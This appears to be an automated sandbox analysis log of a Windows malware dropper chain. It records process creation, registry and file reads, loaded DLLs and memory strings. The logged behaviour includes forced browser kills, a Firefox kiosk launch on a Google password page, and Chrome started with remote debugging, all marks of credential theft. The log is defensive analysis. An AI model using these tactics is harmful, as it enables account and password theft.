Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Program Files\Mozilla Firefox\firefox.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process

Source: C:\Users\user\Desktop\file.exe

File read: C:\Users\user\Desktop\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: file.exe, 00000000.00000002.2157321517.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2151903563.000000001D2F9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: file.exe, 00000000.00000002.2157321517.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2151903563.000000001D2F9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: file.exe, 00000000.00000002.2157321517.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2151903563.000000001D2F9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: chrome.exe, 00000022.00000002.3004636584.00006DEC00792000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE psl_extensions (domain VARCHAR NOT NULL, UNIQUE (domain));
Source: file.exe, 00000000.00000002.2157321517.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2151903563.000000001D2F9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: file.exe, file.exe, 00000000.00000002.2157321517.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2151903563.000000001D2F9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: file.exe, 00000000.00000002.2157321517.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2151903563.000000001D2F9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: file.exe, 00000000.00000002.2157321517.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2151903563.000000001D2F9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2157582636.000000006C68F000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: file.exe, 00000000.00000003.1903436332.000000001D1F9000.00000004.00000020.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2694274027.0000000005EAE000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2659898060.0000000005ECC000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 0000000E.00000003.2660440608.0000000005EAE000.00000004.00000800.00020000.00000000.sdmp, 0718eb7837.exe, 00000010.00000003.2849405786.0000000005E41000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: file.exe, 00000000.00000002.2157321517.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2151903563.000000001D2F9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: file.exe, 00000000.00000002.2157321517.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2151903563.000000001D2F9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);

Source: file.exe

ReversingLabs: Detection: 42%

Source: file.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: DocumentsKECFIDGCBF.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: unknown	Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 --field-trial-handle=2172,i,13112948501450984096,12498418281894245301,262144 /prefetch:8
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsKECFIDGCBF.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\DocumentsKECFIDGCBF.exe "C:\Users\user\DocumentsKECFIDGCBF.exe"
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe "C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe "C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe "C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe "C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe "C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe"
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: unknown	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2320 -parentBuildID 20230927232528 -prefsHandle 2256 -prefMapHandle 2248 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d6cb21c8-5f63-43c4-8208-5eeeb72c7a2d} 1700 "\\.\pipe\gecko-crash-server-pipe.1700" 19dd8070510 socket
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe "C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe"
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4088 -parentBuildID 20230927232528 -prefsHandle 4064 -prefMapHandle 4060 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {26ed0bef-963d-49e6-b1bd-7b4e349261f5} 1700 "\\.\pipe\gecko-crash-server-pipe.1700" 19de8a0bc10 rdd
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe "C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2620 --field-trial-handle=2536,i,8133912956404692815,15819443204232451158,262144 /prefetch:8
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe "C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe"
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Windows\SysWOW64\taskkill.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\DocumentsKECFIDGCBF.exe"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2240 --field-trial-handle=2172,i,13112948501450984096,12498418281894245301,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe "C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\DocumentsKECFIDGCBF.exe "C:\Users\user\DocumentsKECFIDGCBF.exe"	Jump to behavior
Source: C:\Users\user\DocumentsKECFIDGCBF.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe "C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe "C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe "C:\Users\user\AppData\Local\Temp\1008252001\aedbd2e320.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe "C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe "C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008250001\fa55e7c5ed.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2320 -parentBuildID 20230927232528 -prefsHandle 2256 -prefMapHandle 2248 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {d6cb21c8-5f63-43c4-8208-5eeeb72c7a2d} 1700 "\\.\pipe\gecko-crash-server-pipe.1700" 19dd8070510 socket
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: unknown unknown
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=4088 -parentBuildID 20230927232528 -prefsHandle 4064 -prefMapHandle 4060 -prefsLen 26374 -prefMapSize 237879 -appDir "C:\Program Files\Mozilla Firefox\browser" - {26ed0bef-963d-49e6-b1bd-7b4e349261f5} 1700 "\\.\pipe\gecko-crash-server-pipe.1700" 19de8a0bc10 rdd
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2620 --field-trial-handle=2536,i,8133912956404692815,15819443204232451158,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1008253001\2922d7c574.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
Source: C:\Program Files\Mozilla Firefox\firefox.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking

Source: C:\Users\user\Desktop\file.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: mozglue.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: msvcp140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: vcruntime140.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
